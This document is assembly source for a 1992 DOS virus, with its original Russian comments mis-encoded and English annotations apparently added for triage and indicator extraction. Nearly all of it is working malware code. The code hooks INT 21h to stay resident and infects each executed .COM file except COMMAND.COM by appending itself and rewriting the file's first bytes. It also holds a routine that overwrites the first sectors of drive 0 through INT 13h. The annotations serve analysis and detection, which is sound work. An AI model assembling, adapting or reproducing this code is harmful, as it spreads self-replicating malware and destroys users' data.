;
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20>⪮<EFBFBD><E2AAAE><EFBFBD><EFBFBD><EFBFBD><EFBFBD><E0AEA2><EFBFBD>, <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> ⮫쪮 <20><>⮬ <20><><EFBFBD>ᬠ<EFBFBD>ਢ<EFBFBD><E0A8A2><EFBFBD>
|
|||
|
; source code. (<28><><EFBFBD> ࠢ<><E0A0A2> <20><><EFBFBD> <20> <20><><EFBFBD> ࠧ<><E0A0A7><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20>ਤ<EFBFBD><E0A8A4><EFBFBD><EFBFBD> :-)).
|
|||
|
;
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD>쪠<EFBFBD> (<28><><EFBFBD><EFBFBD><EFBFBD>쪠<EFBFBD>) <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20><>৮<EFBFBD><E0A7AE><EFBFBD>, <20><><EFBFBD><EFBFBD><EFBFBD>, ⨭<E1AAAE>...
|
|||
|
;
|
|||
|
; <20> <20><>饬, <20><><EFBFBD><EFBFBD><EFBFBD>, <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><>ࠦ<EFBFBD><E0A0A6><EFBFBD> <20><>直<EFBFBD> ⠬ 䠩<><E4A0A9> <20><><EFBFBD> <20><><EFBFBD><EFBFBD>⪥ <20><>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> - <20><><EFBFBD><EFBFBD> <20> 䠬<><E4A0AC><EFBFBD><EFBFBD><EFBFBD> .COM, <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD>-<2D><> <20><> <20><>ठ<EFBFBD><E0A4A0> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; 21-<2D><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><E0A0AF>, <20><> <20><><EFBFBD>뢠<EFBFBD><EBA2A0> <> ⥫<> <20><>୮<EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20><>ࠦ<EFBFBD><E0A0A6><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; 䠩<><E4A0A9> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><>ਪ<EFBFBD><E0A8AA><EFBFBD> (⠪<><E2A0AA> ⨯<> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>窨, <20>ᯮ<EFBFBD><E1AFAE><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><>த<EFBFBD><E0AEA4> <20><><EFBFBD> <20><>ᥪ<EFBFBD><E1A5AA><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD> <20><><EFBFBD>-祣<> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <><E1A2AE><EFBFBD>), <20><>ᯮ<EFBFBD><E1AFAE><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> 4-<2D><> <20><><EFBFBD><EFBFBD><EFBFBD> <20><> <20><>砫<EFBFBD>, <20> <> <20><><EFBFBD><EFBFBD>稥 <20>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><EFBFBD><E0AEA2><EFBFBD><EFBFBD><EFBFBD> ⠪: <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> AX <><E1ABAE> BABA (<28> <20><><EFBFBD>, <20><> ⠪<><E2A0AA>
|
|||
|
; <><E1ABAE>, <20> word 0BABAh), <20>믮<EFBFBD><EBAFAE><EFBFBD><EFBFBD><EFBFBD> 21-<2D> <20><><EFBFBD><EFBFBD><EFBFBD>⮢<E0A0AF><E2AEA2><EFBFBD><EFBFBD> <20> ᬮ<><E1ACAE><EFBFBD><EFBFBD>,
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD> <20><><EFBFBD><EFBFBD> 0FACCh. <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20><> <20> <20><>窮<EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD>⭮.
|
|||
|
;
|
|||
|
; Copyright (c) 1992, Gogi&Givi International
|
|||
|
;
|
|||
|
|
|||
|
; Assembler setup (TASM-style directives). ".model tiny" with "org 0100h"
; lays the code out as a DOS .COM image, which is loaded at offset 0100h.
jumps
.model tiny
.code
org 0100h
; VirPar: size of the StartVirus..endvir span in 16-byte paragraphs, plus 2.
; NeedsBaba subtracts it from the size word of the host's memory block.
VirPar equ (endvir-StartVirus)/16+2
; VirLen: the same span in bytes. Used as the byte count of the memory copy
; in NeedsBaba and of the append-to-file write in NotCommand.
VirLen equ (endvir-StartVirus)
|
|||
|
; gadost: the start of the carrier program in its infected form.
; For triage, the layout below is what the handler later writes over the
; first four bytes of a file: one opcode byte, a 16-bit displacement, and
; the marker value 15 at file offset 3.
gadost:
        db '<27>'                       ; the original comment names this byte as a CALL opcode; the literal is mis-encoded on this page
        dw StartVirus-$-2               ; 16-bit relative displacement that reaches StartVirus
        db 15,09h                       ; 15 = marker at offset 3 (checked before infecting); 09h = leftover operand of the host's "mov ah," (see RobbedBytes)
        int 21h                         ; host code: DOS call (AH=09h prints the '$'-terminated string at DS:DX)
        ret                             ; host code: ends the .COM program
; Message printed by the host program itself. The literal is mis-encoded on
; this page and is left exactly as found.
GoodMessage db '<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>᪨<EFBFBD>! <20><><EFBFBD> <20>!',13,10,'$'
|
|||
|
; StartVirus: entry reached through the jump bytes at the start of the file.
; It finds its own run-time address, copies the four saved host bytes
; (RobbedBytes) back to 0100h, then asks INT 21h whether a resident copy
; already answers.
; NOTE(review): the header comment of this file mentions 0BABAh / 0FACCh;
; the values actually used by the code are 0ABABh (query) and 0FAAFh (reply).
StartVirus:
        pop si                          ; drop the word the entry stub left on the stack
        call EntryPoint                 ; pushes the run-time address of EntryPoint
EntryPoint:
        pop si                          ; si = run-time offset of EntryPoint; later operands are relative to it
        push ds                         ; keep the segment registers the program started with
        push es
        push si
        mov ax,cs
        mov es,ax                       ; es = ds = cs for the string copy
        mov ds,ax
        mov di,0100h                    ; destination: first byte of the .COM image
        add si,RobbedBytes-EntryPoint   ; source: the four saved host bytes
        mov cx,4
        cld                             ; copy in ascending order
        rep movsb                       ; host's first four bytes are restored in memory only
        pop si                          ; si = EntryPoint again
        mov ax,0ABABh                   ; residency query handled by Int21Server
        int 21h
        cmp ax,0FAAFh                   ; value Int21Server returns for the query
        jne NeedsBaba                   ; no such reply: continue with installation
        jmp FucksNow                    ; reply seen: skip installation, run the host
|
|||
|
; NeedsBaba: makes the code resident. It reduces the size word of the
; program's memory block by VirPar paragraphs, copies VirLen bytes into the
; area cut off, saves the current INT 21h vector into Off21/Seg21 and points
; the vector at Int21Server inside the copy.
; Observable effects: the INT 21h vector (0000:0084h) changes, and the
; memory block of the running program shrinks by VirPar paragraphs.
NeedsBaba:
        pop es                          ; es = value pushed at EntryPoint
        push es                         ; put it back for FucksNow
        mov ax,es
        dec ax
        mov es,ax                       ; paragraph below that segment; presumably the DOS memory control block (assumes es was the PSP) - TODO confirm
        mov ax,es:[3]                   ; word at offset 3 (block size in paragraphs under that assumption)
        sub ax,virpar
        mov es:[3],ax                   ; write the reduced size back
        mov bx,es:[1]                   ; word at offset 1 (owner segment under that assumption)
        add bx,ax                       ; bx = segment where the cut-off area begins
        mov es,bx
        push ds
        xor ax,ax
        mov ds,ax                       ; ds = 0: interrupt vector table
        mov ax,ds:[21h*4]               ; current INT 21h offset
        mov cs:[si+Off21-EntryPoint],ax ; stored in Off21 of the running copy
        mov ax,ds:[21h*4+2]             ; current INT 21h segment
        mov cs:[si+Seg21-EntryPoint],ax ; stored in Seg21 of the running copy
        pop ds
        xor di,di                       ; destination es:0000
        push si
        sub si,EntryPoint-StartVirus    ; source: run-time address of StartVirus
        mov cx,VirLen
        rep movsb                       ; copy includes the Off21/Seg21 values saved above
        pop si
        push ds
        xor ax,ax
        mov ds,ax
        mov word ptr ds:[21h*4],Int21Server-StartVirus ; new INT 21h offset: Int21Server within the copy
        mov ds:[21h*4+2],es             ; new INT 21h segment: the copy
        pop ds
|
|||
|
|
|||
|
; FucksNow: common exit of the loader. Restores the segment registers saved
; at EntryPoint and returns to 0100h, where the host's first four bytes were
; put back earlier.
FucksNow:
        pop es
        pop ds
        mov si,0100h
        push si                         ; 0100h becomes the return address for the ret below
        xor ax,ax                       ; ax, bx and di are cleared before the host runs
        xor bx,bx
        xor di,di
        ret                             ; near return to cs:0100h
|
|||
|
|
|||
|
; Int21Server: the INT 21h handler installed by NeedsBaba.
; AX = 0ABABh is answered directly with AX = 0FAAFh (the residency check
; made at EntryPoint); any other request continues at NotTest.
; The query/reply pair is a usable indicator that this handler is resident.
Int21Server:
        pushf                           ; save caller state; Quit21Server pops in reverse order
        push ax
        push bx
        push ds
        cmp ax,0ABABh
        jne NotTest
        pop ds                          ; query path: undo the pushes
        pop bx
        pop ax
        popf
        mov ax,0FAAFh                   ; reply value
        iret                            ; return to the caller without calling the previous handler
|
|||
|
|
|||
|
; NotTest: selects DOS function 4Bh (EXEC). Instead of comparing AH
; directly, AH is moved into CL and XORed with 4Bh, so ZF is set only when
; AH = 4Bh. CX is restored before branching.
NotTest:
        push cx
        mov cx,ax
        xchg cl,ch                      ; cl = caller's AH
        xor cl,4Bh                      ; ZF = 1 only when AH was 4Bh
        pop cx                          ; pop does not alter the flags
        jz Exec
        jmp NotExec                     ; any other function is passed on unchanged
|
|||
|
|
|||
|
; Exec: runs for INT 21h function 4Bh, where DS:DX points at the
; zero-terminated path of the program being started.
; Scans to the terminating zero, steps back 11 characters and compares them
; with the first 11 bytes of CommandName ('COMMAND.COM'). A full match means
; the file is left alone and the request goes straight to Quit21Server.
Exec:
        mov bx,dx                       ; bx walks the path; dx keeps the start of it
SearchZero:
        cmp byte ptr ds:[bx],0
        je ZeroFound
        inc bx
        jmp SearchZero
ZeroFound:
        sub bx,11                       ; bx = 11 characters before the terminator
        push es
        mov ax,cs
        mov es,ax                       ; es = handler segment, where CommandName is stored
        mov cx,11
        mov di,offset CommandName-StartVirus ; offset within the resident copy, which starts at offset 0
Compare:
        mov al,ds:[bx]
        cmp al,es:[di]
        jne NotCommand                  ; first mismatch: not COMMAND.COM
        inc bx
        inc di
        dec cx
        cmp cx,0
        jne Compare
        pop es
        jmp Quit21Server                ; all 11 bytes matched: pass the call on untouched
|
|||
|
; NotCommand: file-modification path for a program other than COMMAND.COM.
; Steps visible below:
;   1. open the file read/write and read its first 4 bytes into RobbedBytes;
;   2. leave it unchanged if those bytes start with the EXE signature, if the
;      length check fails, or if byte 3 already equals 15 (the marker);
;   3. otherwise append VirLen bytes of the resident copy at end of file and
;      overwrite the first 4 bytes with SuperByte, FileSize and 15.
; Resulting file indicators: length grows by VirLen, byte at offset 3 is 0Fh,
; and bytes 1-2 hold (old length - 3).
NotCommand:
        pop es                          ; balance the push made at ZeroFound
        push ax                         ; saved here, restored at EndExec
        push bx
        push cx
        push dx
        mov ax,3D02h                    ; DOS open, access mode 2 (read/write); path still at DS:DX
        int 21h
        jc EndExec1                     ; open failed
        mov bx,ax                       ; bx = file handle
        mov cx,4                        ; read four bytes
        mov ax,cs
        mov ds,ax                       ; ds = handler segment for the buffer
        mov ah,3Fh                      ; DOS read
        mov dx,offset RobbedBytes-StartVirus
        int 21h
        jc EndExec1                     ; read failed
        cmp word ptr cs:[RobbedBytes-StartVirus],'ZM' ; EXE signature test; 'ZM' as a word presumably matches the bytes "MZ" in the file - TODO confirm assembler byte order
        je CloseFile
        xor cx,cx
        xor dx,dx
        mov ax,4202h                    ; DOS seek, offset 0 from end of file: returns the length in DX:AX
        int 21h
        cmp ax,1000                     ; only AX (low word of the length) is examined
        jl CloseFile                    ; jl is a signed jump, so values of 8000h and above take this branch as well
        cmp ax,64000
        ja CloseFile
        sub ax,3
        mov cs:[FileSize-StartVirus],ax ; length - 3: the displacement written after the opcode byte
        cmp byte ptr cs:[RobbedBytes-StartVirus+3],15 ; marker already present at offset 3?
        je CloseFile
        mov ax,cs
        mov ds,ax
        mov ah,40h                      ; DOS write at the current position (end of file after the seek)
        xor dx,dx                       ; buffer = offset 0 of the resident copy
        mov cx,VirLen
        int 21h
        xor cx,cx
        xor dx,dx
        mov ax,4200h                    ; DOS seek to the start of the file
        int 21h
        mov ah,40h
        mov dx,offset SuperByte-StartVirus ; SuperByte, FileSize and the marker byte are contiguous
        mov cx,4
        int 21h                         ; overwrite the first four bytes of the file
        jmp CloseFile

; Stepping stone to EndExec for the two error exits above.
EndExec1: jmp EndExec
|
|||
|
|
|||
|
; '$'-terminated strings shown by the CloseFile path. Both are plain ASCII
; and can serve as static string indicators when scanning files or memory.
mess1: db 'Hi! hello from MSS!',0dh,0ah,'$'
str1 db ' HELLO FROM OVER1 ','$'
|
|||
|
|
|||
|
; game: destructive routine. Resets count to 0, then issues BIOS INT 13h
; function 03h (write sectors): 8 sectors, cylinder 0, head 0, starting at
; sector 1 of drive 0, with the data taken from ES:BX.
; The only branch to it is the "jz game" after the screen routine, taken
; when count = 3. In this listing the only stores to count write 0 and the
; increment in CloseFile is commented out.
game: mov al,0
        mov [count-0124h],al            ; count = 0; 0124h is presumably the offset of StartVirus in the assembled file - TODO confirm
        mov ax,0308h                    ; AH = 03h write sectors, AL = 8 sectors
        mov bx,offset endvir            ; buffer offset; es is whatever the caller of INT 21h had
        mov dx,0000h                    ; DH = head 0, DL = drive 0
        mov cx,0001h                    ; CH = cylinder 0, CL = sector 1
        int 13h
        jmp eee
|
|||
|
; CloseFile: closes the handle in BX, then runs the visible "greeting".
; It prints mess1, switches to video mode 0, draws a three-row frame with
; BIOS INT 10h (AH=02h set cursor, AH=09h write character with attribute)
; and prints str1 inside it, switches to video mode 2, and finally tests
; count. Every path through NotCommand that opened the file ends here.
; Frame characters are codes 201/205/187/186/200/188 (double-line box glyphs
; in the PC character set); the attribute byte is 01000010b throughout.
CloseFile:
        mov ah,3Eh                      ; DOS close handle
        int 21h

        push ds                         ; restored at eee
        push cs
        pop ds                          ; ds = handler segment for the data references below
; Disabled counter logic, kept as found (comment text only):
;       mov al,[count-0124h]
;       inc al
;       mov [count-0124h],al
;       cmp al,02h
;       jl eee
        mov ah,09                       ; DOS print '$'-terminated string
        mov dx,offset mess1-0124h       ; rebased by 0124h, like count
        int 21h

        mov ah,0
        mov al,0                        ; INT 10h AH=00h: set video mode 0
        int 10h

        mov ah,2
        mov bh,0
        mov dh,0
        mov dl,10
        int 10h                         ; cursor to row 0, column 10

        mov ah,9
        mov al,201
        mov bl,01000010b
        mov bh,0
        mov cx,1
        int 10h                         ; top-left corner

        mov ah,2
        mov bh,0
        mov dh,0
        mov dl,11
        int 10h                         ; cursor to row 0, column 11

        mov ah,9
        mov al,205
        mov bl,01000010b
        mov bh,0
        mov cx,20
        int 10h                         ; 20 horizontal bars (top edge)

        mov ah,2
        mov bh,0
        mov dh,0
        mov dl,31
        int 10h                         ; cursor to row 0, column 31

        mov ah,9
        mov al,187
        mov bl,01000010b
        mov bh,0
        mov cx,1
        int 10h                         ; top-right corner

        mov ah,2
        mov bh,0
        mov dh,1
        mov dl,10
        int 10h                         ; cursor to row 1, column 10

        mov ah,9
        mov bl,01000010b
        mov al,186
        mov bh,0
        mov cx,1
        int 10h                         ; left vertical bar

        mov ah,2
        mov dx,010bh                    ; DH = 1, DL = 11
        int 10h                         ; cursor to row 1, column 11

        mov ah,9
        mov dx,offset str1
        int 21h                         ; DOS print string (str1)

        mov ah,2
        mov bh,0
        mov dh,1
        mov dl,31
        int 10h                         ; cursor to row 1, column 31

        mov ah,9
        mov al,186
        mov bl,01000010b
        mov bh,0
        mov cx,1
        int 10h                         ; right vertical bar

        mov ah,2
        mov dh,2
        mov dl,31
        int 10h                         ; cursor to row 2, column 31

        mov ah,9
        mov al,188
        mov bl,01000010b
        mov bh,0
        mov cx,1
        int 10h                         ; bottom-right corner

        mov ah,2
        mov dh,2
        mov dl,10
        int 10h                         ; cursor to row 2, column 10

        mov ah,9
        mov al,200
        mov bl,01000010b
        mov bh,0
        mov cx,1
        int 10h                         ; bottom-left corner

        mov ah,2
        mov dh,2
        mov dl,11
        int 10h                         ; cursor to row 2, column 11

        mov ah,9
        mov al,205
        mov bl,01000010b
        mov bh,0
        mov cx,20
        int 10h                         ; 20 horizontal bars (bottom edge)

        mov ah,2
        mov dh,25
        mov dl,0
        int 10h                         ; cursor to row 25, column 0

        mov ah,2
        mov bh,0
        mov dh,24
        mov dl,0
        int 10h                         ; cursor to row 24, column 0

        MOV AL,2
        mov ah,0
        int 10h                         ; INT 10h AH=00h: set video mode 2

        mov al,[count-0124h]
        cmp al,3
        jz game                         ; count = 3 leads to the INT 13h write in game

eee: pop ds                             ; undo the "push ds" made after the close
|
|||
|
|
|||
|
; EndExec: restores the four registers pushed at NotCommand, then leaves
; through Quit21Server.
EndExec:
        pop dx
        pop cx
        pop bx
        pop ax
        jmp Quit21Server

; NotExec: requests other than function 4Bh arrive here; there is no code of
; its own, execution falls through to Quit21Server.
NotExec:

; Quit21Server: restores what Int21Server pushed and transfers control to
; the previous INT 21h handler. The 0EAh byte together with Off21 and Seg21
; forms a far jump whose target NeedsBaba filled in from the vector table.
Quit21Server:
        pop ds
        pop bx
        pop ax
        popf
        db 0EAh                         ; far JMP opcode; operand follows as offset, then segment
Off21 dw 0000h                          ; offset of the previous INT 21h handler
Seg21 dw 0000h                          ; segment of the previous INT 21h handler
|
|||
|
|
|||
|
; Data area at the end of the body.
; RobbedBytes: four-byte buffer holding the original first bytes of the host
; (filled by the read in NotCommand, copied back to 0100h at EntryPoint). In
; this carrier file it is pre-loaded with the host's own opening bytes:
; "mov dx,offset GoodMessage" plus the 0B4h opcode of "mov ah,".
RobbedBytes:
        mov dx,offset GoodMessage
        db 0B4h
; SuperByte, FileSize and the following byte are the four bytes NotCommand
; writes over the start of a file.
SuperByte db '<27>'                     ; opcode byte; literal is mis-encoded on this page (compare the first byte at gadost)
FileSize dw 0000h                       ; set to (file length - 3) before the write
        db 15                           ; marker value that ends up at file offset 3
        db '=>'
CommandName db 'COMMAND.COM<='          ; only the first 11 bytes are compared in Exec
count db 1 dup (0)                      ; tested against 3 after the screen routine
REG DB 1 DUP (0)                        ; not referenced anywhere in this listing
endvir:                                 ; end marker used by VirLen and VirPar
end gadost                              ; program entry point is gadost
|